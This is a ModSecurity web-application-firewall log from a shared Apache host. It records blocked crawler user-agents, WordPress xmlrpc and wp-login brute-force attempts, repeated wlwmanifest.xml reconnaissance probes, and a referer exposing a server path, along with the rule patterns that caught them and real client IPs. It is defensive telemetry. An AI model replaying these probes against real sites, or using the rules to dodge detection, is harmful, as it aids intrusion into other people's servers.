[Tue May 26 18:52:21.094596 2026] [security2:error] [pid 1036960:tid 1037108] [client 185.191.171.19:11412] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.yourstorybag.com"] [uri "/robots.txt"] [unique_id "ahWejYGNKXNii6nttH9R6gAAAJc"]
[Tue May 26 18:52:21.094744 2026] [security2:error] [pid 1036960:tid 1037108] [client 185.191.171.19:11412] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.yourstorybag.com"] [uri "/robots.txt"] [unique_id "ahWejYGNKXNii6nttH9R6gAAAJc"]
[Tue May 26 18:52:21.566828 2026] [security2:error] [pid 1036960:tid 1037111] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWejYGNKXNii6nttH9R7QAAAJo"]
[Tue May 26 18:52:22.675223 2026] [security2:error] [pid 1036960:tid 1037119] [client 124.123.80.40:65394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 40.80.123.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/xmlrpc.php"] [unique_id "ahWejoGNKXNii6nttH9SCAAAAKI"]
[Tue May 26 18:52:22.675356 2026] [security2:error] [pid 1036960:tid 1037119] [client 124.123.80.40:65394] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "rehobothindependentcare.com"] [uri "/xmlrpc.php"] [unique_id "ahWejoGNKXNii6nttH9SCAAAAKI"]
[Tue May 26 18:52:24.081583 2026] [security2:error] [pid 1036960:tid 1037123] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWej4GNKXNii6nttH9SMQAAAKY"]
[Tue May 26 18:52:24.700787 2026] [security2:error] [pid 1036960:tid 1037022] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWekIGNKXNii6nttH9SSAAAoz0"]
[Tue May 26 18:52:24.700927 2026] [security2:error] [pid 1036960:tid 1037120] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWekIGNKXNii6nttH9SSAAAoz0"]
[Tue May 26 18:52:25.745558 2026] [security2:error] [pid 1036960:tid 1037150] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWekYGNKXNii6nttH9SWQAAAME"]
[Tue May 26 18:52:26.841989 2026] [security2:error] [pid 1036960:tid 1037013] [remote 74.7.241.58:46826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWekoGNKXNii6nttH9SfQAAkTQ"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/mailchimp-for-wp/integrations/wpforms
[Tue May 26 18:52:26.908472 2026] [security2:error] [pid 1036960:tid 1037158] [client 147.92.52.145:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWekoGNKXNii6nttH9SgAAAAMk"], referer: https://www.anujtradingco.com/
[Tue May 26 18:52:26.998977 2026] [security2:error] [pid 1036960:tid 1037005] [remote 113.190.40.93:48772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWekoGNKXNii6nttH9SfAAAyCw"]
[Tue May 26 18:52:27.063533 2026] [security2:error] [pid 1036960:tid 1037100] [client 45.92.1.242:52250] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "holix.ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/wp-includes/wlwmanifest.xml"] [unique_id "ahWek4GNKXNii6nttH9ShQAAAI8"]
[Tue May 26 18:52:27.523427 2026] [security2:error] [pid 1036960:tid 1037173] [client 45.92.1.242:54797] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "holix.ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWek4GNKXNii6nttH9SjwAAANg"]
[Tue May 26 18:52:27.603862 2026] [security2:error] [pid 1036960:tid 1037017] [remote 38.95.35.74:47072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWek4GNKXNii6nttH9SjgAAiDg"]
[Tue May 26 18:52:27.824611 2026] [security2:error] [pid 1036960:tid 1037163] [client 45.92.1.242:61359] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "holix.ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWek4GNKXNii6nttH9SnAAAAM4"]
[Tue May 26 18:52:27.831486 2026] [security2:error] [pid 1036960:tid 1037018] [remote 38.95.35.74:47072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWek4GNKXNii6nttH9SmgAAqTk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:52:27.939427 2026] [security2:error] [pid 1036960:tid 1037168] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webdisk.ndequipments.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWek4GNKXNii6nttH9SpQAAANM"]
[Tue May 26 18:52:28.127137 2026] [security2:error] [pid 1036960:tid 1037181] [client 45.92.1.242:61849] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "holix.ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWelIGNKXNii6nttH9SqgAAAOA"]
[Tue May 26 18:52:28.160804 2026] [security2:error] [pid 1036960:tid 1037132] [client 185.191.171.4:59920] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.yourstorybag.com"] [uri "/storytelling-as-a-career-for-women/"] [unique_id "ahWelIGNKXNii6nttH9SqwAAAK8"]
[Tue May 26 18:52:28.160975 2026] [security2:error] [pid 1036960:tid 1037132] [client 185.191.171.4:59920] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.yourstorybag.com"] [uri "/storytelling-as-a-career-for-women/"] [unique_id "ahWelIGNKXNii6nttH9SqwAAAK8"]
[Tue May 26 18:52:28.185815 2026] [security2:error] [pid 1036960:tid 1037143] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWek4GNKXNii6nttH9SmAAAALo"]
[Tue May 26 18:52:28.227763 2026] [security2:error] [pid 1036960:tid 1037210] [client 2.58.56.163:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.56.58.2.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWelIGNKXNii6nttH9SqQAAAP0"]
[Tue May 26 18:52:28.308100 2026] [security2:error] [pid 1036960:tid 1037176] [client 147.92.52.145:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWelIGNKXNii6nttH9SrgAAANs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1443956&moderation-hash=9164ad00ee6584c7e227ef699a9953b1
[Tue May 26 18:52:28.433211 2026] [security2:error] [pid 1036960:tid 1037184] [client 45.92.1.242:65418] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "holix.ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWelIGNKXNii6nttH9SswAAAOM"]
[Tue May 26 18:52:28.737664 2026] [security2:error] [pid 1036960:tid 1037193] [client 45.92.1.242:56870] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "holix.ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWelIGNKXNii6nttH9SuwAAAOw"]
[Tue May 26 18:52:28.841162 2026] [security2:error] [pid 1036960:tid 1037182] [client 119.159.164.203:59265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.164.159.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "restmoll.com"] [uri "/xmlrpc.php"] [unique_id "ahWelIGNKXNii6nttH9SsgAAAOE"]
[Tue May 26 18:52:28.841322 2026] [security2:error] [pid 1036960:tid 1037182] [client 119.159.164.203:59265] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "restmoll.com"] [uri "/xmlrpc.php"] [unique_id "ahWelIGNKXNii6nttH9SsgAAAOE"]
[Tue May 26 18:52:28.855612 2026] [security2:error] [pid 1036960:tid 1037137] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webdisk.ndequipments.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWelIGNKXNii6nttH9SwgAAALQ"]
[Tue May 26 18:52:29.014147 2026] [security2:error] [pid 1036960:tid 1037092] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webdisk.ndequipments.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWelYGNKXNii6nttH9SyQAAAIc"]
[Tue May 26 18:52:29.033170 2026] [security2:error] [pid 1036960:tid 1037173] [client 45.92.1.242:52443] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "holix.ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWelYGNKXNii6nttH9SzQAAANg"]
[Tue May 26 18:52:29.325798 2026] [security2:error] [pid 1036960:tid 1037128] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webdisk.ndequipments.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWelYGNKXNii6nttH9S0gAAAKs"]
[Tue May 26 18:52:29.352209 2026] [security2:error] [pid 1036960:tid 1037163] [client 45.92.1.242:63512] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "holix.ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWelYGNKXNii6nttH9S1gAAAM4"]
[Tue May 26 18:52:29.637653 2026] [security2:error] [pid 1036960:tid 1037132] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webdisk.ndequipments.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWelYGNKXNii6nttH9S3QAAAK8"]
[Tue May 26 18:52:29.675892 2026] [security2:error] [pid 1036960:tid 1037179] [client 45.92.1.242:53531] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "holix.ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWelYGNKXNii6nttH9S3gAAAN4"]
[Tue May 26 18:52:29.815899 2026] [security2:error] [pid 1036960:tid 1037189] [client 45.134.225.250:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWelYGNKXNii6nttH9S5AAAAOg"]
[Tue May 26 18:52:29.951917 2026] [security2:error] [pid 1036960:tid 1037136] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webdisk.ndequipments.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWelYGNKXNii6nttH9S6wAAALM"]
[Tue May 26 18:52:29.980243 2026] [security2:error] [pid 1036960:tid 1037184] [client 45.92.1.242:49963] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "holix.ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWelYGNKXNii6nttH9S7wAAAOM"]
[Tue May 26 18:52:30.264647 2026] [security2:error] [pid 1036960:tid 1037100] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webdisk.ndequipments.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWeloGNKXNii6nttH9S-QAAAI8"]
[Tue May 26 18:52:30.290447 2026] [security2:error] [pid 1036960:tid 1037108] [client 45.92.1.242:53323] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "holix.ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWeloGNKXNii6nttH9S-gAAAJc"]
[Tue May 26 18:52:30.571785 2026] [security2:error] [pid 1036960:tid 1037205] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webdisk.ndequipments.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWeloGNKXNii6nttH9TAwAAAPg"]
[Tue May 26 18:52:30.597854 2026] [security2:error] [pid 1036960:tid 1037090] [client 45.92.1.242:55554] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "holix.ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWeloGNKXNii6nttH9TBAAAAIU"]
[Tue May 26 18:52:30.878894 2026] [security2:error] [pid 1036960:tid 1037109] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webdisk.ndequipments.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWeloGNKXNii6nttH9TDQAAAJg"]
[Tue May 26 18:52:30.887197 2026] [security2:error] [pid 1036960:tid 1037105] [client 45.92.1.242:51142] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "holix.ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWeloGNKXNii6nttH9TDwAAAJQ"]
[Tue May 26 18:52:31.033635 2026] [security2:error] [pid 1036960:tid 1037200] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeloGNKXNii6nttH9TBwAAAPM"]
[Tue May 26 18:52:31.191724 2026] [security2:error] [pid 1036960:tid 1037189] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webdisk.ndequipments.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWel4GNKXNii6nttH9TGAAAAOg"]
[Tue May 26 18:52:31.202657 2026] [security2:error] [pid 1036960:tid 1037147] [client 45.92.1.242:59397] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "holix.ktmadvance-senegal.com"] [uri "/cgi-sys/suspendedpage.cgi/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWel4GNKXNii6nttH9TGQAAAL4"]
[Tue May 26 18:52:31.496178 2026] [security2:error] [pid 1036960:tid 1037198] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webdisk.ndequipments.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWel4GNKXNii6nttH9TJQAAAPE"]
[Tue May 26 18:52:31.809305 2026] [security2:error] [pid 1036960:tid 1037104] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webdisk.ndequipments.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWel4GNKXNii6nttH9TKQAAAJM"]
[Tue May 26 18:52:31.897676 2026] [security2:error] [pid 1036960:tid 1037193] [client 37.59.204.134:22418] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "midrivermarina.com"] [uri "/robots.txt"] [unique_id "ahWel4GNKXNii6nttH9TKgAAAOw"]
[Tue May 26 18:52:31.897841 2026] [security2:error] [pid 1036960:tid 1037193] [client 37.59.204.134:22418] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "midrivermarina.com"] [uri "/robots.txt"] [unique_id "ahWel4GNKXNii6nttH9TKgAAAOw"]
[Tue May 26 18:52:32.116766 2026] [security2:error] [pid 1036960:tid 1037117] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webdisk.ndequipments.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWemIGNKXNii6nttH9TMgAAAKA"]
[Tue May 26 18:52:32.331846 2026] [security2:error] [pid 1036960:tid 1037149] [client 147.92.52.145:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWemIGNKXNii6nttH9TNQAAAMA"], referer: https://anujtradingco.com
[Tue May 26 18:52:32.429197 2026] [security2:error] [pid 1036960:tid 1037096] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webdisk.ndequipments.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWemIGNKXNii6nttH9TNgAAAIs"]
[Tue May 26 18:52:32.457615 2026] [security2:error] [pid 1036960:tid 1037123] [client 114.119.148.187:30167] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.xllent.in"] [uri "/kawasaki1.php"] [unique_id "ahWemIGNKXNii6nttH9TNwAAAKY"], referer: http://www.xllent.in/kawasaki1.php?id=vortex-sprocketrear-black-49-tooth525-link-for-kawasakisuzuki-zx600r-f1f3-9597-zr7-0003-gsxr600-97-9800-gsxr750-9899-product-code-491zk49-p-13658.html
[Tue May 26 18:52:32.741874 2026] [security2:error] [pid 1036960:tid 1037197] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webdisk.ndequipments.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWemIGNKXNii6nttH9TQAAAAPA"]
[Tue May 26 18:52:33.047525 2026] [security2:error] [pid 1036960:tid 1037095] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webdisk.ndequipments.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWemYGNKXNii6nttH9TUAAAAIo"]
[Tue May 26 18:52:33.220288 2026] [security2:error] [pid 1036960:tid 1037131] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWemIGNKXNii6nttH9TQwAAAK4"]
